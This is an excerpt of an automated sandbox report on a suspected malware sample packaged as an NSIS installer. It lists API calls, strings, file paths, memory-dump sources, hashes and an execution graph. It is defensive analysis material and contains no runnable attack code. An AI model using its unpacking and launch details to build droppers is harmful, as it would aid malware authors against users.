                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                        • String ID:
                                        • API String ID: 1404258612-0
                                        • Opcode ID: ec7151e13ff031cd6146c14c1100c40685b360c9b493fb258c96d19e35a9089b
                                        • Instruction ID: 9791f4c70c1528f8983e13c97e2cb0ced061aec02aec85b9ff59acd402aedfa8
                                        • Opcode Fuzzy Hash: ec7151e13ff031cd6146c14c1100c40685b360c9b493fb258c96d19e35a9089b
                                        • Instruction Fuzzy Hash: A0117071901209BEDF01EFA5DD85DAEBBB9EF04344B20807AF505F61A1D7388E55DB28
                                        Function 0040585F Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                        Download Yara Rule
                                        APIs
                                        • CharNextA.USER32(?,?,Invaliditetsprocent209\indoktrineringen.rec,?,004058CB,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,?,?,77462EE0,00405616,?,C:\Users\user\AppData\Local\Temp\,77462EE0,00000000), ref: 0040586D
                                        • CharNextA.USER32(00000000), ref: 00405872
                                        • CharNextA.USER32(00000000), ref: 00405886
                                        Strings
                                        • Invaliditetsprocent209\indoktrineringen.rec, xrefs: 00405860
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: CharNext
                                        • String ID: Invaliditetsprocent209\indoktrineringen.rec
                                        • API String ID: 3213498283-2173611331
                                        • Opcode ID: 2ea991d7d7ffd85479a521eab3fc1e567f9f9a9fdda000af801139d1d19966a1
                                        • Instruction ID: 725a23b4e930c3b6c27a7d0cd0e333612dd42f6c53d199a680129a9385ae8045
                                        • Opcode Fuzzy Hash: 2ea991d7d7ffd85479a521eab3fc1e567f9f9a9fdda000af801139d1d19966a1
                                        • Instruction Fuzzy Hash: 74F06253914F516AFB3276645C44B7B5A8CCF56361F188477EE40A62C2C2BC4C618F9A
                                        Function 00404F93 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • IsWindowVisible.USER32(?), ref: 00404FC2
                                        • CallWindowProcA.USER32(?,?,?,?), ref: 00405013
                                          • Part of subcall function 00404038: SendMessageA.USER32(00010448,00000000,00000000,00000000), ref: 0040404A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: Window$CallMessageProcSendVisible
                                        • String ID:
                                        • API String ID: 3748168415-3916222277
                                        • Opcode ID: a1366604d20516d7a227b416e124a8c8ccbf6a8c92e3cea699473ae65b9a4b61
                                        • Instruction ID: 01da3f5901ddaf9404fa7d81b8fd4ad62d8e53e58d7af57a61279808ed2d7cb1
                                        • Opcode Fuzzy Hash: a1366604d20516d7a227b416e124a8c8ccbf6a8c92e3cea699473ae65b9a4b61
                                        • Instruction Fuzzy Hash: EA018F7110020DABDF209F11DC85E9F3B6AF784758F208037FA04752D1D77A8C92AAAE
                                        Function 004058B4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00405D36: lstrcpynA.KERNEL32(?,?,00000400,00403287,00422F00,NSIS Error), ref: 00405D43
                                          • Part of subcall function 0040585F: CharNextA.USER32(?,?,Invaliditetsprocent209\indoktrineringen.rec,?,004058CB,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,?,?,77462EE0,00405616,?,C:\Users\user\AppData\Local\Temp\,77462EE0,00000000), ref: 0040586D
                                          • Part of subcall function 0040585F: CharNextA.USER32(00000000), ref: 00405872
                                          • Part of subcall function 0040585F: CharNextA.USER32(00000000), ref: 00405886
                                        • lstrlenA.KERNEL32(Invaliditetsprocent209\indoktrineringen.rec,00000000,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,?,?,77462EE0,00405616,?,C:\Users\user\AppData\Local\Temp\,77462EE0,00000000), ref: 00405907
                                        • GetFileAttributesA.KERNEL32(Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,00000000,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,?,?,77462EE0,00405616,?,C:\Users\user\AppData\Local\Temp\,77462EE0), ref: 00405917
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                        • String ID: Invaliditetsprocent209\indoktrineringen.rec
                                        • API String ID: 3248276644-2173611331
                                        • Opcode ID: 681a1499075d1ef18d3e94b36260b5cb5e6403957cf75bde6daaeed28ee23a5f
                                        • Instruction ID: cee4b60d78671bb78a10d3fddc0396ac835ea714c96625339261d657e7680c9f
                                        • Opcode Fuzzy Hash: 681a1499075d1ef18d3e94b36260b5cb5e6403957cf75bde6daaeed28ee23a5f
                                        • Instruction Fuzzy Hash: 0AF02823105D6026C63233391C09AAF1B95CE86368B24853FFC51B22D1DB3C8863DE7E
                                        Function 004024D1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlenA.KERNEL32(00000000,00000011), ref: 004024EF
                                        • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 0040250E
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll, xrefs: 004024DD, 00402502
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: FileWritelstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll
                                        • API String ID: 427699356-1112140929
                                        • Opcode ID: f7e9c7c3a0b030329b9eac82e2999ac8e5cd3652365a72a00433b5ad3c482558
                                        • Instruction ID: 4826b5ec7f58a8945af1d05ae4e09a11cd1e532a13e769836b40841c5f4177c7
                                        • Opcode Fuzzy Hash: f7e9c7c3a0b030329b9eac82e2999ac8e5cd3652365a72a00433b5ad3c482558
                                        • Instruction Fuzzy Hash: 80F054B2A54244BFDB40ABA19E499EB66A4DB40309F10443FB141F61C2D5BC4941A66A
                                        Function 004054E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421500,Error launching installer), ref: 0040550E
                                        • CloseHandle.KERNEL32(?), ref: 0040551B
                                        Strings
                                        • Error launching installer, xrefs: 004054F8
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: CloseCreateHandleProcess
                                        • String ID: Error launching installer
                                        • API String ID: 3712363035-66219284
                                        • Opcode ID: a807c8c1498f9a3ccd34e9273e49e04dcb617f56f5cccdb726230c0895ca6d7f
                                        • Instruction ID: 0ae392a05d3974bec86de51aa2f8a5c28ff0ee3cdd976454f3eed0d5dd72dd2a
                                        • Opcode Fuzzy Hash: a807c8c1498f9a3ccd34e9273e49e04dcb617f56f5cccdb726230c0895ca6d7f
                                        • Instruction Fuzzy Hash: 2BE0BFB4A00209BFEB109FA4ED05F7B76ADEB14745F508561BD11F2160E774A9108A79
                                        Function 004036F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                        Download Yara Rule
                                        APIs
                                        • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,77462EE0,004036C9,77463410,004034D6,?), ref: 0040370C
                                        • GlobalFree.KERNEL32(006D20D8), ref: 00403713
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403704
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: Free$GlobalLibrary
                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 1100898210-787714339
                                        • Opcode ID: 86ea4e8f2e330b4051334ac2fa91e3adcb647da4565bec0431381526e270e322
                                        • Instruction ID: 0fe4964e98027e88380181352afc78dea88c0f551701ba437740c6db36bc47f5
                                        • Opcode Fuzzy Hash: 86ea4e8f2e330b4051334ac2fa91e3adcb647da4565bec0431381526e270e322
                                        • Instruction Fuzzy Hash: 0EE0EC7390512097C6215F96AD04B5ABB686B89B62F06842AED407B3A18B746C418BD9
                                        Function 0040580D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CE5,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\fJuwM4Bwi7.exe,C:\Users\user\Desktop\fJuwM4Bwi7.exe,80000000,00000003), ref: 00405813
                                        • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CE5,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\fJuwM4Bwi7.exe,C:\Users\user\Desktop\fJuwM4Bwi7.exe,80000000,00000003), ref: 00405821
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: CharPrevlstrlen
                                        • String ID: C:\Users\user\Desktop
                                        • API String ID: 2709904686-3443045126
                                        • Opcode ID: c27a981e79bb352b20b7a8c74a9367836393bd04b8b6ccbc39cacac652a51138
                                        • Instruction ID: ba052d51ab232c33a65bcd29671eceb75c11827358d6bb1c4ef4a0a5cf44e1aa
                                        • Opcode Fuzzy Hash: c27a981e79bb352b20b7a8c74a9367836393bd04b8b6ccbc39cacac652a51138
                                        • Instruction Fuzzy Hash: 94D0A77341AD701EE30372109C04B8F6A48CF16300F098462E440B61A0C2780C414BED
                                        Function 100010E0 Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
                                        • GlobalFree.KERNEL32(00000000), ref: 100011B4
                                        • GlobalFree.KERNEL32(?), ref: 100011C7
                                        • GlobalFree.KERNEL32(?), ref: 100011F5
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79058661791.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                        • Associated: 00000005.00000002.79058630911.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000005.00000002.79058691430.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000005.00000002.79058724593.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_10000000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: Global$Free$Alloc
                                        • String ID:
                                        • API String ID: 1780285237-0
                                        • Opcode ID: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                        • Instruction ID: 5d3a3765e571093bf703368c32e31ec5bfeafbef09712c331e02e9e13643e521
                                        • Opcode Fuzzy Hash: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                        • Instruction Fuzzy Hash: 6531ABB1808255AFF715CFA8DC89AEA7FE8EB052C1B164115FA45D726CDB34D910CB24
                                        Function 0040592C Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B5B,00000000,[Rename],00000000,00000000,00000000), ref: 0040593C
                                        • lstrcmpiA.KERNEL32(00405B5B,00000000), ref: 00405954
                                        • CharNextA.USER32(00405B5B,?,00000000,00405B5B,00000000,[Rename],00000000,00000000,00000000), ref: 00405965
                                        • lstrlenA.KERNEL32(00405B5B,?,00000000,00405B5B,00000000,[Rename],00000000,00000000,00000000), ref: 0040596E
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: lstrlen$CharNextlstrcmpi
                                        • String ID:
                                        • API String ID: 190613189-0
                                        • Opcode ID: 0add82ed76356020c4ee8264c56a6ad6875436601f5ed096891bbb40787d2247
                                        • Instruction ID: 6acf3bc3cda9f3bfd2525b0ac34aa546eab038af588102683640af0afc927a81
                                        • Opcode Fuzzy Hash: 0add82ed76356020c4ee8264c56a6ad6875436601f5ed096891bbb40787d2247
                                        • Instruction Fuzzy Hash: 27F0C232604518FFC7129BA4DD40D9FBBA8EF06360B2500AAE800F7250D274EE019FAA

                                        Execution Graph

                                        Execution Coverage:0%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:34.7%
                                        Total number of Nodes:95
                                        Total number of Limit Nodes:0
                                        execution_graph 33266 3290a290 45 API calls 33349 3290c090 6 API calls 33393 32943194 26 API calls 33394 32942594 32 API calls 33268 3292d690 RtlDebugPrintTimes RtlDebugPrintTimes 33264 32952b90 LdrInitializeThunk 33395 32939194 25 API calls 33314 329b8b90 31 API calls 33396 329c0593 53 API calls 33272 3290ca84 41 API calls 33353 3292f889 33 API calls 33274 3294b28a LdrInitializeThunk 33316 329eb781 26 API calls 33275 329082b0 30 API calls 33400 329e15ba 37 API calls 33277 329b7abe 7 API calls 33356 329500a5 68 API calls 33278 329106a0 34 API calls 33357 329100a0 37 API calls 33403 3293b1a0 35 API calls 33404 329445a3 24 API calls 33280 3290e2aa GetPEB GetPEB GetPEB 33281 329342af 43 API calls 33358 329bf0a5 57 API calls 33405 3290c1d0 28 API calls 33321 32913bd0 RtlDebugPrintTimes GetPEB GetPEB 33360 3293f4d0 36 API calls 33323 3290e3c0 33 API calls 33362 3290b0c0 51 API calls 33407 329251c0 31 API calls 33282 329432c0 32 API calls 33326 329cdbcb 16 API calls 33283 329c06c6 46 API calls 33327 32907bf0 31 API calls 33408 329171f0 75 API calls 33284 329112f3 GetPEB GetPEB 33329 3292cbf0 34 API calls 33365 329bf8f8 58 API calls 33286 3294d6f1 27 API calls 33367 329d70f1 RtlDebugPrintTimes RtlDebugPrintTimes RtlDebugPrintTimes 33409 329ea1f0 8 API calls 33287 329072e0 GetPEB 33368 329078e1 25 API calls 33369 329158e0 193 API calls 33288 329366e0 49 API calls 33370 329a30ee 115 API calls 33410 329191e5 119 API calls 33331 329137e4 35 API calls 33289 329cc6e4 39 API calls 33291 329362e9 42 API calls 33292 32909610 36 API calls 33412 329bf51b 13 API calls 33374 32919810 171 API calls 33375 32912410 31 API calls 33332 3293c310 GetPEB GetPEB GetPEB GetPEB GetPEB 33293 3290821b 28 API calls 33333 3290c301 45 API calls 33414 32912500 45 API calls 33296 3290e202 6 API calls 33376 32923800 GetPEB GetPEB GetPEB GetPEB 33297 3293d600 109 API calls 33416 3293510f 54 API calls 33378 3290640d 193 API calls 33300 32907a30 35 API calls 33379 329cc03d 43 API calls 33417 3292d530 26 API calls 33303 3299da31 GetPEB GetPEB GetPEB RtlDebugPrintTimes 33304 3290b620 27 API calls 33336 3298fb28 39 API calls 33381 3290b420 30 API calls 33418 32941527 31 API calls 33383 3299f42f 29 API calls 33420 329ea526 RtlDebugPrintTimes RtlDebugPrintTimes RtlDebugPrintTimes RtlDebugPrintTimes RtlDebugPrintTimes 33337 3291872a GetPEB GetPEB RtlDebugPrintTimes 33338 3299d724 28 API calls 33384 32911051 27 API calls 33386 3291d454 9 API calls 33424 3294415f 28 API calls 33339 3290a740 52 API calls 33425 3290c140 30 API calls 33426 3292e547 46 API calls 33387 32919046 44 API calls 33388 32920445 53 API calls 33427 3290a147 27 API calls 33428 3290c170 39 API calls 33342 3293a370 100 API calls 33345 3298e372 33 API calls 33389 329ce076 22 API calls 33309 329cd270 98 API calls 33347 32944b79 26 API calls 33310 3290b260 49 API calls 33391 32907060 RtlDebugPrintTimes 33348 3291b360 6 API calls 33311 32923660 105 API calls 33392 329da464 17 API calls

                                        Executed Functions

                                        Function 32952B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 32952b90-32952b9c LdrInitializeThunk
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: a3a392afab9672766efa8d7e4d985dd17228e3e019de7bfb67694f1776944846
                                        • Instruction ID: 416a01c55788266201ffc58e46d60df9dc2e5dd4945dc73a57fdcd1016f5ec2d
                                        • Opcode Fuzzy Hash: a3a392afab9672766efa8d7e4d985dd17228e3e019de7bfb67694f1776944846
                                        • Instruction Fuzzy Hash: AB90023120118802D5506158960475A005557D0319F55C856A4514618DC6A988997122
                                        Function 329534E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1 329534e0-329534ec LdrInitializeThunk
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 7701345b3d285cd1338810a5180cf8d471c1c32c2e61c1d1c945abf2090fd830
                                        • Instruction ID: 2562144037972cc8e5e736afe160418c5b86023614e485078860c7b1e7a91280
                                        • Opcode Fuzzy Hash: 7701345b3d285cd1338810a5180cf8d471c1c32c2e61c1d1c945abf2090fd830
                                        • Instruction Fuzzy Hash: 9290023160520402D54061585714716105557D0219F61C856A0514528DC7A9895975A3

                                        Non-executed Functions

                                        Function 329B9060 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 558timeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
